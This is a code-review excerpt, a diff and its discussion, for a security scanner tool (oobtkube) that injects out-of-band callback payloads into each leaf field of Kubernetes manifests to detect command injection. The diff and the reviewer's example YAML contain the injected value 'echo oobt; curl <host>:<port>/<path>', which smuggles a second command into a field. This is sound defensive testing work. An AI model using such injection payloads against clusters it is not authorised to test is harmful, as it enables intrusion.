scanners/generic/tools/oobtkube.py

```diff
@@ -110,50 +117,82 @@ def get_sarif_output(shared_queue):
-            )
+
+    def get_leaf_keys(obj: Union[Dict, List], path: Optional[List] = None) -> Generator[List[str], None, None]:
+        """Collect all possible leaves in the k8s object"""
+        if isinstance(obj, dict):
+            items = obj.items()
+        elif isinstance(obj, list):
+            items = enumerate(obj)
         else:
-            processed_leaf_keys += 1
-            logging.info(f"Testing a leaf key: '{key}', ({processed_leaf_keys} / {total_leaf_keys})")
-            cmd = f"sed 's/{key}:.*/{key}: \"echo oobt; curl {ipaddr}:{port}\\/{key}\"/g' {original_file} > {tmp_file}"
-            logging.debug(f"Command run: {cmd}")
-            os.system(cmd)
+            return
+
+        if path is None:  # avoids W0102: Dangerous default value [] as argument (dangerous-default-value)
+            path = []
+
+        for key, value in items:
+            # skip modifying these top-level keys, we mostly want to test 'spec' data of k8s API objects
+            if path == [] and key in ("apiVersion", "kind", "metadata"):
+                continue
+
+            current_path = path + [key]
+
+            if isinstance(value, (dict, list)):
+                yield from get_leaf_keys(value, current_path)
+            else:
+                yield current_path
 
-            redirect = "&> /dev/null"
-            if logging.getLogger().isEnabledFor(logging.DEBUG):
-                # don't supress output when debug logging
-                redirect = ""
-            # if using 'apply' and a resource already exists, the command won't run as it returns as 'unchanged'
-            # therefore 'create' and 'replace' are used
-            kube_cmd = f"kubectl create -f {tmp_file} {redirect} || kubectl replace -f {tmp_file} {redirect}"
+    def modify_leaf_key(obj: Union[Dict, List], path: List, value: str) -> Union[Dict, List]:
+        """Create a new object with a single modified value at the given path"""
+        new_obj = copy.deepcopy(obj)
+        current = new_obj
 
-            logging.debug(f"Command run: {kube_cmd}")
-            os.system(kube_cmd)
+        # Navigate to the parent of the target node
+        for key in path[:-1]:
+            current = current[key]
 
-    return processed_leaf_keys
+        current[path[-1]] = value
+
+        return new_obj
+
+    leaf_keys = list(get_leaf_keys(data))
+
+    # For each leaf key, create a new modified object with an injected payload
+    with tempfile.NamedTemporaryFile(mode="w", suffix=".yaml") as tmp:
+        for i, path in enumerate(leaf_keys):
+            path_str = ".".join(str(p) for p in path)
+            logging.info(f"Testing leaf key ({i+1} / {len(leaf_keys)}): {path_str}")
+            # TODO test more kinds of payload variations
+            payload = f"echo oobt; curl {ipaddr}:{port}/{path_str}"
+            modified_data = modify_leaf_key(data, path, payload)
+
+            yaml.dump(modified_data, tmp)
```

Comment:
`modified_data` keeps being added to the same tmp file e.g.:

$ cat <tmpfile.yaml>
```
apiVersion: v1
kind: Pod
metadata:
  name: foo
spec:
  defaultPlugins:
  - echo oobt; curl 127.0.0.1:3002/spec.defaultPlugins.0
  - plugin2
 ... snipped ...
apiVersion: v1
kind: Pod
metadata:
  name: foo
spec:
  defaultPlugins:
  - plugin1
  - echo oobt; curl 127.0.0.1:3002/spec.defaultPlugins.1
 ... snipped ...
```

Reply:
Good catch! That would have been quite the mistake :sweat_smile: . Should be fixed now.